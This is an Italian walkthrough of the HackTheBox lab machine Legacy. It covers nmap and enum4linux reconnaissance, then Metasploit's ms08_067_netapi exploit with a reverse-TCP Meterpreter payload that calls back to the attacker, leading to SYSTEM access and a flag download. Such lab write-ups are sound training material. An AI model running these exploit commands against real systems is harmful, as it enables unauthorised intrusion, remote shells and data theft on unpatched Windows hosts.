Walkthrough HTB – Machine Legacy
Obiettivo: Ottenere accesso come utente e successivamente come amministratore sulla macchina Legacy di HackTheBox.
1. Reconnaissance
nmap -sC -sV -oN nmap/legacy.txt 10.10.10.4
Risultato nmap:
139/tcp→ NetBIOS445/tcp→ Microsoft-DS
2. Enumerazione SMB
Utilizziamo enum4linux per raccogliere informazioni:
enum4linux -a 10.10.10.4
Identifichiamo che la macchina esegue Windows XP e ha condivisioni SMB accessibili.
3. Exploitazione con Metasploit
Carichiamo Metasploit e cerchiamo un exploit adatto:
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.10.10.4
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <tuo_IP>
exploit
Nota: L’exploit ms08_067_netapi è noto per compromettere sistemi Windows XP non patchati.
4. Accesso alla Shell
Una volta eseguito l’exploit con successo, otteniamo una sessione Meterpreter:
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
5. Escalation dei Privilegi
Verifichiamo i privilegi attuali:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Siamo già connessi come SYSTEM, quindi abbiamo i massimi privilegi.
6. Raccolta delle Bandiere
Navighiamo nelle directory degli utenti per trovare le bandiere:
meterpreter > cd C:\Documents and Settings\Administrator\Desktop
meterpreter > ls
flag.txt
Scarichiamo il file:
meterpreter > download flag.txt
Conclusione
La macchina Legacy sfrutta una vulnerabilità critica in SMB su sistemi Windows XP. L’utilizzo di Metasploit semplifica notevolmente l’exploitazione. È fondamentale comprendere le implicazioni di sicurezza legate a sistemi obsoleti e non aggiornati.